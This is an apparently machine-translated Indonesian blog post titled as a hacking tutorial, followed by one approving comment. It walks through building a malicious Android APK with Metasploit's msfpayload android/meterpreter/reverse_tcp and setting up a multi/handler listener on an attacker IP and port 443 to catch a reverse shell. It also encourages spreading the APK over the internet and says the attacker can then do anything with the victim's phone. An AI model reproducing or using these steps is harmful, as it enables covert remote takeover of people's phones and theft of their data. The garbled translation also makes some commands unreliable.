Diposting oleh Wisnu Valentino di Hacking Tutorial , Telepon Hacking | 79 comments
Saat ini pengguna ponsel yang meningkat dari hari ke hari, ancaman
keamanan juga meningkat bersama-sama dengan pertumbuhan penggunanya. Tutorial kami untuk hari ini adalah bagaimana Hacking Android Smartphone Tutorial menggunakan Metasploit. Mengapa kita memilih ponsel android untuk tutorial ini? hanya karena telepon akhir-akhir ini android berkembang sangat cepat di seluruh dunia. Di sini, di Cina Anda bisa mendapatkan ponsel android hanya US $ 30 itu salah satu alasan mengapa android tumbuh cepat. Apa android? menurut wikipedia :
Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc, yang didukung Google finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersama dengan pendiri Open Handset Alliance: konsorsium hardware, software, dan perusahaan telekomunikasi yang ditujukan untuk memajukan standar terbuka untuk mobile perangkat.dan apa APK? menurut wikipedia:
Android file paket aplikasi (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; sangat mirip dengan paket MSI pada Windows atau paket Deb di sistem operasi berbasis Debian seperti Ubuntu.Berikut adalah beberapa informasi awal untuk tutorial ini:
Penyerang alamat IP: 192.168.8.94
Pelabuhan penyerang untuk menerima koneksi: 443
Persyaratan:
1. kerangka Metasploit (kami menggunakan Kali Linux 1.0.6 dalam tutorial ini)
2. smartphone Android (kami menggunakan HTC One android 4.4 KitKat)
Langkah demi langkah Hacking Android Smartphone Tutorial menggunakan Metasploit:
1. Buka terminal (CTRL + ALT + T) lihat tutorial cara membuat shortcut keyboard yang linux .2. Kami akan memanfaatkan kerangka muatan Metasploit untuk membuat mengeksploitasi untuk tutorial ini.
msfpayload android / meterpreter / reverse_tcp LHOST = <attacker_ip_address> LPORT = <port_to_receive_connection>Seperti dijelaskan di atas bahwa penyerang alamat IP 192.168.8.94, di bawah ini adalah screenshot kami ketika dieksekusi perintah
3. Karena muatan kita adalah reverse_tcp mana penyerang berharap korban untuk terhubung kembali ke mesin penyerang, penyerang perlu mengatur penangan untuk menangani koneksi masuk ke port yang sudah ditentukan di atas. Ketik msfconsole untuk pergi ke Metasploit konsol.
Info:
menggunakan exploit / multi-/ handler -> kita akan menggunakan Metasploit handler4. Langkah selanjutnya kita harus mengkonfigurasi switch untuk muatan Metasploit kita sudah ditentukan pada langkah 3.
set payload android / meterpreter / reverse_tcp -> pastikan payload adalah sama dengan langkah 2
Info:
set LHOST 192.168.8.94 -> penyerang alamat IP5. Penyerang telah memiliki file APK dan sekarang dia akan mulai mendistribusikannya (saya tidak perlu menjelaskan bagaimana mendistribusikan file ini, internet adalah tempat yang baik untuk distribusi ).
set LPORT 443 -> pelabuhan untuk mendengarkan koneksi terbalik
mengeksploitasi -> mulai mendengarkan koneksi masuk
6. Singkat cerita korban (saya sendiri) men-download file APK yang berbahaya dan menginstalnya. Setelah korban membuka aplikasi, penyerang Metasploit konsol mendapatkan sesuatu seperti ini:
7. Ini berarti penyerang yang sudah di dalam smartphone android korban dan ia dapat melakukan segala sesuatu dengan ponsel korban.
mantapp gan
ReplyDelete